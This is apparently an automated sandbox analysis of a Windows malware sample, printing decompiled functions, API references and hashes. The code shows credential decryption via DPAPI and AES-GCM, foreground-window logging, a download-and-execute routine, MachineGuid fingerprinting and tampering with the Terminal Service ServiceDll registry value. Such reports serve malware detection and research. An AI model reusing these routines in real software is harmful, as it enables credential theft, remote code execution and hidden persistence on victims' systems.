                                  • Instruction ID: ffd892ab46af73f70c32251edc3eb7415e86c97fd1647a449630ba4d99c917e8
                                  • Opcode Fuzzy Hash: 41f9955962fd48e9ea245ec66b04e5d3ca09e58cb9f6d5fe03a8e1ac849ee31d
                                  • Instruction Fuzzy Hash: F9319771600506BBD704EBB1CC55FAEB7ACAF04358F00423AF51AB21D1DB78AA15CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00410A8C(void* __ecx, void* __eflags) {
                                  				void* _v8;
                                  				short _v12;
                                  				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                  				long _v20;
                                  				long _v24;
                                  				union _SID_NAME_USE _v28;
                                  				short _v60;
                                  				short _v580;
                                  				void* _t37;
                                  
                                  				_v20 = 0x10;
                                  				_v8 = 0;
                                  				_t37 = __ecx;
                                  				_v16.Value = 0;
                                  				_v12 = 0x500;
                                  				E00401052( &_v580, 0, 0x208);
                                  				_v24 = 0x104;
                                  				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
                                  					GetLastError();
                                  				}
                                  				if(_v8 != 0) {
                                  					FreeSid(_v8);
                                  				}
                                  				E004036F7(_t37,  &_v580);
                                  				return _t37;
                                  			}


                                  APIs
                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D311,?,?,00000001), ref: 00410AE1
                                  • LookupAccountSidW.ADVAPI32(00000000,0040D311,?,00000104,?,00000010,?), ref: 00410B06
                                  • GetLastError.KERNEL32(?,?,00000001), ref: 00410B10
                                  • FreeSid.ADVAPI32(0040D311,?,?,00000001), ref: 00410B1E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                  • String ID:
                                  • API String ID: 1866703397-0
                                  • Opcode ID: 9bde5b841e5e6782f258dacd33f4a5e37663f90cec39e38d6a01389e9cc630e0
                                  • Instruction ID: 268544a994eea4337760f271e77acc5a4e560188a377bc451064b1715e62684d
                                  • Opcode Fuzzy Hash: 9bde5b841e5e6782f258dacd33f4a5e37663f90cec39e38d6a01389e9cc630e0
                                  • Instruction Fuzzy Hash: 0C11FE71A0020DABDB10DFD0DC89EEFB7BCEB08344F004476F205E2190D7749A849B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00410BBE(WCHAR** __ecx, intOrPtr* __edx) {
                                  				struct HRSRC__* _t13;
                                  				void* _t14;
                                  				unsigned int _t32;
                                  				intOrPtr* _t35;
                                  				struct HINSTANCE__* _t36;
                                  
                                  				_t35 = __edx;
                                  				_t36 = LoadLibraryExW( *__ecx, 0, 2);
                                  				if(_t36 == 0xffffffff) {
                                  					L4:
                                  					return 0;
                                  				}
                                  				_t13 = FindResourceW(_t36, 1, 0x10);
                                  				if(_t13 == 0) {
                                  					goto L4;
                                  				}
                                  				_t14 = LoadResource(_t36, _t13);
                                  				if(_t14 == 0) {
                                  					goto L4;
                                  				}
                                  				_t32 =  *(_t14 + 0x28);
                                  				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
                                  				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
                                  				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
                                  				 *(_t35 + 8) = _t32 & 1;
                                  				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
                                  				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
                                  				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
                                  				FreeLibrary(_t36);
                                  				return 1;
                                  			}


                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BC9
                                  • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BDD
                                  • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BE9
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410C2E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadResource$FindFree
                                  • String ID:
                                  • API String ID: 3272429154-0
                                  • Opcode ID: 370e803f3f576e3dc6d64e982104e9389b7bb4e1ba6f79afae3c6c1c6fe46297
                                  • Instruction ID: f4e202401f230fa34ee939e17adc442f0fb496cb623fe9efe51c7003b0681515
                                  • Opcode Fuzzy Hash: 370e803f3f576e3dc6d64e982104e9389b7bb4e1ba6f79afae3c6c1c6fe46297
                                  • Instruction Fuzzy Hash: A601C0B5315A05AFD3184F299C84AA6B6A4FF49310704C239E825C73A0D7B8D891CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E0040C157(void* __ecx, intOrPtr _a8, intOrPtr _a12) {
                                  				char _v8;
                                  				void* _v12;
                                  				char _v16;
                                  				void* _t16;
                                  				void* _t19;
                                  				void* _t34;
                                  				void* _t35;
                                  
                                  				_t35 = 0;
                                  				_t16 = E0040C3B9(__ecx,  &_v12,  &_v8);
                                  				_pop(_t26);
                                  				if(_t16 == 0) {
                                  					L8:
                                  					return _t35;
                                  				}
                                  				_t34 = _v12;
                                  				if(_v8 >= 5) {
                                  					_t19 = E00401000(_t34, "DPAPI", 5);
                                  					_t42 = _t19;
                                  					if(_t19 == 0) {
                                  						_push( &_v16);
                                  						_push( &_v12);
                                  						if(E0040C1DD(_t34 + 5, _v8 - 5, _t42) != 0) {
                                  							if(_v16 == 0x20) {
                                  								_t35 = E0040C419(_t22, _v12, _a8, _a12);
                                  							}
                                  							LocalFree(_v12);
                                  						}
                                  					}
                                  				}
                                  				LocalFree(_t34);
                                  				goto L8;
                                  			}


                                  APIs
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                    • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                    • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  • LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040C1D1
                                    • Part of subcall function 0040C1DD: GetLastError.KERNEL32 ref: 0040C243
                                  • LocalFree.KERNEL32(?), ref: 0040C1CA
                                    • Part of subcall function 0040C419: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                    • Part of subcall function 0040C419: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                    • Part of subcall function 0040C419: BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
                                  • String ID: $DPAPI
                                  • API String ID: 379455710-1819349886
                                  • Opcode ID: 723dafc30d50a614663938c1a140f779ca85de166bebee2fe5dd54bad53c82e3
                                  • Instruction ID: a3944bf262eb46a5dfa84945d41dbb41adefefd1d9f51366da1d16fc86cbb9f5
                                  • Opcode Fuzzy Hash: 723dafc30d50a614663938c1a140f779ca85de166bebee2fe5dd54bad53c82e3
                                  • Instruction Fuzzy Hash: ED016176900109EBCF10EBA1DC859EEB779AB44358F018276FD00B61C5E774AA45CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E004048B7(intOrPtr _a4) {
                                  				char _v8;
                                  				struct tagLASTINPUTINFO _v16;
                                  				signed int _v36;
                                  				char _v40;
                                  				short _v552;
                                  
                                  				_v16.cbSize = 8;
                                  				GetLastInputInfo( &_v16);
                                  				_t23 = GetTickCount() - _v16.dwTime;
                                  				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
                                  				E004036F7( &_v8,  &_v552);
                                  				_t12 =  &_v36;
                                  				_v36 = _v36 & 0x00000000;
                                  				asm("xorps xmm0, xmm0");
                                  				_v40 = 0x15;
                                  				asm("movups [ebp-0x1c], xmm0");
                                  				E0040378B(E00403873(E00403852( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
                                  				E00403777( &_v40);
                                  				E00405FEB(_v8);
                                  				return _a4;
			}


                                  APIs
                                  • GetLastInputInfo.USER32 ref: 004048CC
                                  • GetTickCount.KERNEL32 ref: 004048D2
                                  • GetForegroundWindow.USER32 ref: 004048E6
                                  • GetWindowTextW.USER32 ref: 004048F9
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                  • String ID:
                                  • API String ID: 2567647128-0
                                  • Opcode ID: 2619e4c47768c66cf31bb9552d597a32af07dc8ffc93b02f453276f2778d0e8b
                                  • Instruction ID: 7d24786f3acb5e761febb0f7532cdf611125a99f062c3633d978c4158144353a
                                  • Opcode Fuzzy Hash: 2619e4c47768c66cf31bb9552d597a32af07dc8ffc93b02f453276f2778d0e8b
                                  • Instruction Fuzzy Hash: D2110C72D00109ABCB04EFA1DD59ADDBBBDEF58305F0081A9B406B7191EF78AB44CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041111B() {
                                  				void* _v8;
                                  				long _v12;
                                  				void _v16;
                                  				long _t21;
                                  				void* _t22;
                                  
                                  				_t22 = 0;
                                  				_v8 = 0;
                                  				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                                  					_t21 = 4;
                                  					_v12 = _t21;
                                  					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12);
                                  					_t22 =  !=  ? _v16 : 0;
                                  				}
                                  				if(_v8 != 0) {
                                  					CloseHandle(_v8);
                                  				}
                                  				return 0 | _t22 != 0x00000000;
			}


                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                  • GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                  • CloseHandle.KERNEL32(00000000), ref: 00411167
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                  • String ID:
                                  • API String ID: 215268677-0
                                  • Opcode ID: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                  • Instruction ID: 0771c0d2f46ea20c01bd2ae64a6620b8b7ded6cbafb58bfe859f8e00c08c725d
                                  • Opcode Fuzzy Hash: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                  • Instruction Fuzzy Hash: 87F0F971E00218FBDB119BA0DD09BDEBBB8EF08751F118065EA01E61A0D7709F84DAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040FFA8(void* __ecx) {
                                  				void* _t14;
                                  				long _t15;
                                  				void** _t26;
                                  				void* _t27;
                                  
                                  				_t27 = __ecx;
                                  				_t1 = _t27 + 0x14; // 0x42661c
                                  				_t26 = _t1;
                                  				if( *_t26 == 0) {
                                  					L6:
                                  					_t5 = _t27 + 0x10; // 0x426618
                                  					E004101AB(_t5);
                                  					_t6 = _t27 + 4; // 0x42660c
                                  					E004101AB(_t6);
                                  					_t7 = _t27 + 0xc; // 0x426614
                                  					E004101AB(_t7);
                                  					_t8 = _t27 + 8; // 0x426610
                                  					_t14 = E004101AB(_t8);
                                  					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
                                  					return _t14;
                                  				}
                                  				_t15 = GetCurrentThreadId();
                                  				_t2 = _t27 + 0x18; // 0x0
                                  				if(_t15 ==  *_t2) {
                                  					L5:
                                  					E004101AB(_t26);
                                  					goto L6;
                                  				}
                                  				if( *(_t27 + 0x10) == 0) {
                                  					return _t15;
                                  				}
                                  				_t4 = _t27 + 0x10; // 0x0
                                  				SetEvent( *_t4);
                                  				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
                                  					TerminateThread( *_t26, 0xfffffffe);
                                  				}
                                  				goto L5;
			}


                                  APIs
                                  • GetCurrentThreadId.KERNEL32(?,00000000,00402BC7,00000000,exit,00000000,start), ref: 0040FFB4
                                  • SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                  • WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                  • TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                  • String ID:
                                  • API String ID: 2174867186-0
                                  • Opcode ID: 9d65ee8b535991cc2c83cc34afe86964b00005fc8ac1bd73bdc2cdf835250f44
                                  • Instruction ID: feb65e06b3125344950c2ecfb6ecdf7295e9879baf5c0db247f31f74b0556ec4
                                  • Opcode Fuzzy Hash: 9d65ee8b535991cc2c83cc34afe86964b00005fc8ac1bd73bdc2cdf835250f44
                                  • Instruction Fuzzy Hash: 04011231004641EBE734AF11EC89AEA7BB2BF54315F504A3EF097515E2CBB969C9CA44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E0040290E(void* __ecx, void* __eflags, signed int _a4) {
                                  				short* _v12;
                                  				void* _v16;
                                  				char _v20;
                                  				void* _t26;
                                  				void* _t36;
                                  				void* _t38;
                                  				void* _t42;
                                  				void* _t58;
                                  				void* _t59;
                                  
                                  				_t66 = __eflags;
                                  				_t42 = __ecx;
                                  				_t58 = 0x1a;
                                  				E00410C8A( &_v12, _t58, __eflags);
                                  				_t59 = 0xa;
                                  				_t26 = E004035B9( &_v16, _t59, __eflags);
                                  				E00403447(E0040357C( &_v12, _t59, _t66, "\\"), _t66, _t26);
                                  				E00405FEB(_v16);
                                  				_t61 = _a4 + 4;
                                  				E0040373F( &_v16, _a4 + 4);
                                  				E00403447( &_v12, _t66, E0040362F( &_v16,  &_a4));
                                  				E00405FEB(_a4);
                                  				_a4 = _a4 & 0x00000000;
                                  				E00405FEB(_v16);
                                  				_t36 = E0040373F( &_a4, _t61);
                                  				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
                                  				E00405FEB(_a4);
                                  				if(_t36 == 0) {
                                  					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
                                  					_v16 = 2;
                                  					__eflags = _t38 - 0x20;
                                  					if(_t38 > 0x20) {
                                  						_v16 = 0;
                                  					}
                                  				} else {
                                  					_v16 = 1;
                                  				}
                                  				_v20 = 0x417810;
                                  				E00405044(_t42,  &_v20);
                                  				return E00405FEB(_v12);
			}


                                  APIs
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040362F: PathFindExtensionW.SHLWAPI(?), ref: 00403639
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040299B
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 004029C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                  • String ID: open
                                  • API String ID: 4166385161-2758837156
                                  • Opcode ID: 1aebbe6f057188939f6ccd063137f4492537f7fa75c1047f87171207195197f8
                                  • Instruction ID: 7d7fc589e9963d25af6e0cc8dd23fda473545fd51eb9e29652c6e1dbcd1770d4
                                  • Opcode Fuzzy Hash: 1aebbe6f057188939f6ccd063137f4492537f7fa75c1047f87171207195197f8
                                  • Instruction Fuzzy Hash: 18214F71A00108BBCB15AFA6C885EEE7B78EF84759F00406AF416772C1DB785645CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E004111D7(intOrPtr* __ecx, void* __edx) {
                                  				void* _v8;
                                  				char _v12;
                                  				char _v16;
                                  				int _v20;
                                  				char _v24;
                                  				int* _t18;
                                  				void* _t48;
                                  				int* _t50;
                                  
                                  				_t48 = __edx;
                                  				_t35 = __ecx;
                                  				_t50 = __ecx;
                                  				_v8 = 0;
                                  				_v24 = 0;
                                  				_v20 = 0;
                                  				 *((intOrPtr*)(__ecx)) = 0;
                                  				 *((intOrPtr*)(__ecx + 4)) = 0;
                                  				if( *0x55ad8c != 0) {
                                  					_t18 = 0x55ad88;
                                  				} else {
                                  					RegOpenKeyExW(0x80000002,  *(E004036F7( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
                                  					asm("sbb esi, esi");
                                  					E00405FEB(_v12);
                                  					if(1 != 0) {
                                  						E00412569(_t48, E004036F7( &_v12, L"MachineGuid"),  &_v24);
                                  						E00405FEB(_v12);
                                  						E00412554( &_v8);
                                  					}
                                  					E00402FCE(_t50, E004061C0( &_v16,  &_v24));
                                  					E00403148( &_v16);
                                  					_t35 = 0x55ad88;
                                  					_t18 = _t50;
                                  				}
                                  				E00402FCE(_t35, _t18);
                                  				E00403148( &_v24);
                                  				E00412554( &_v8);
                                  				return _t50;
			}


                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                  • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                  • API String ID: 1903904756-1211650757
                                  • Opcode ID: 0878068cc0617e8ee81653ff448fb6a8a08afcac8a43ee38602db7464b46be7e
                                  • Instruction ID: abda254be5c657bc903fa0ced37de60f06049733804472e9a7e1bd392f4ec8b1
                                  • Opcode Fuzzy Hash: 0878068cc0617e8ee81653ff448fb6a8a08afcac8a43ee38602db7464b46be7e
                                  • Instruction Fuzzy Hash: 40115C30A0011AAACB04EF95C9628EEBB79AF54745B50016FF401B31D1DBB85F49DBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040DCBF(void* __edx) {
                                  				void* _v8;
                                  				void* _v12;
                                  				short* _v16;
                                  				int _v20;
                                  				char _v24;
                                  				void* _t28;
                                  				void* _t46;
                                  				int _t48;
                                  
                                  				_t46 = __edx;
                                  				_v8 = 0;
                                  				E004036F7( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                  				_v24 = 0;
                                  				_v20 = 0;
                                  				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
                                  					L3:
                                  					_t48 = 0;
                                  				} else {
                                  					_t28 = E00412569(_t46, E004036F7( &_v12, L"ServiceDll"),  &_v24);
                                  					E00405FEB(_v12);
                                  					if(_t28 != 0) {
                                  						_t48 = E0040335A(E0040300A( &_v24,  &_v12), 0x55ad4c);
                                  						E00405FEB(_v12);
                                  						_v12 = 0;
                                  					} else {
                                  						E00412554( &_v8);
                                  						goto L3;
                                  					}
                                  				}
                                  				E00403148( &_v24);
                                  				E00405FEB(_v16);
                                  				E00412554( &_v8);
                                  				return _t48;
			}


                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  • ServiceDll, xrefs: 0040DCFF
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DCCC
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                  • API String ID: 1903904756-387424650
                                  • Opcode ID: 75b9c23a000a5adcdb465497512319edbf0587ad7d0d336b37f382028eb078bb
                                  • Instruction ID: 01bca762208379d142ed9eb01ac329b8ace23437b38cc5e4ab4ac662769df0df
                                  • Opcode Fuzzy Hash: 75b9c23a000a5adcdb465497512319edbf0587ad7d0d336b37f382028eb078bb
                                  • Instruction Fuzzy Hash: EB114C71D00209BACB14EFA2C9928EEBB78EE50705F10016AE801B72C1DB785F05CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D856(void* __ecx, void* __edx) {
                                  				void* _v12;
                                  				void* _v16;
                                  				short* _v20;
                                  				int _v24;
                                  				char _v28;
                                  				char _v36;
                                  				void* _t26;
                                  				void* _t28;
                                  				void* _t43;
                                  				int _t44;
                                  				void* _t45;
                                  
                                  				_t43 = __edx;
                                  				_t45 = __ecx;
                                  				_t44 = 0;
                                  				_v12 = 0;
                                  				E004036F7( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                  				_v28 = 0;
                                  				_v24 = 0;
                                  				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
                                  					_t26 = E00403333(_t45 + 0x34, _t43,  &_v36);
                                  					_t28 = E004125DF( &_v12, E004036F7( &_v16, L"ServiceDll"), _t26, 2);
                                  					E00405FEB(_v16);
                                  					_v16 = 0;
                                  					E00403148( &_v36);
                                  					E00412554( &_v12);
                                  					if(_t28 != 0) {
                                  						_t44 = 1;
                                  					}
                                  				}
                                  				E00403148( &_v28);
                                  				E00405FEB(_v20);
                                  				E00412554( &_v12);
                                  				return _t44;
                                  			}

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                    • Part of subcall function 004125DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  • ServiceDll, xrefs: 0040D8A3
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040D862
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                  • API String ID: 2854241163-387424650
                                  • Opcode ID: 6f802987656521ece80262853ed865ace36b12f590ac2954457a01a4c77227ab
                                  • Instruction ID: f4c174c2a9310d4c42edb30c9c3d52768df1180ce11ea76c469564d993fc98ad
                                  • Opcode Fuzzy Hash: 6f802987656521ece80262853ed865ace36b12f590ac2954457a01a4c77227ab
                                  • Instruction Fuzzy Hash: C2111C75D00219ABCB14EF92CC96DEFBB79EF94704F40406EE812B22D1DB785A45CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00412569(void* __edx, short** _a4, intOrPtr _a8) {
                                  				int _v8;
                                  				int _v12;
                                  				void* __ecx;
                                  				void* _t14;
                                  				short** _t23;
                                  				void** _t25;
                                  				void** _t32;
                                  				char* _t36;
                                  
                                  				_push(_t25);
                                  				_push(_t25);
                                  				_t23 = _a4;
                                  				_t32 = _t25;
                                  				_v8 = 0;
                                  				_v12 = 0;
                                  				if(RegQueryValueExW( *_t32,  *_t23, 0,  &_v12, 0,  &_v8) != 0) {
                                  					L5:
                                  					_t14 = 0;
                                  				} else {
                                  					_t36 = E00401085(_v8);
                                  					if(RegQueryValueExW( *_t32,  *_t23, 0,  &_v12, _t36,  &_v8) != 0) {
                                  						goto L5;
                                  					} else {
                                  						E004030CC(_a8, _t36, _v8);
                                  						if(_t36 != 0) {
                                  							E00401099(_t36);
                                  						}
                                  						_t14 = 1;
                                  					}
                                  				}
                                  				return _t14;
                                  			}

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
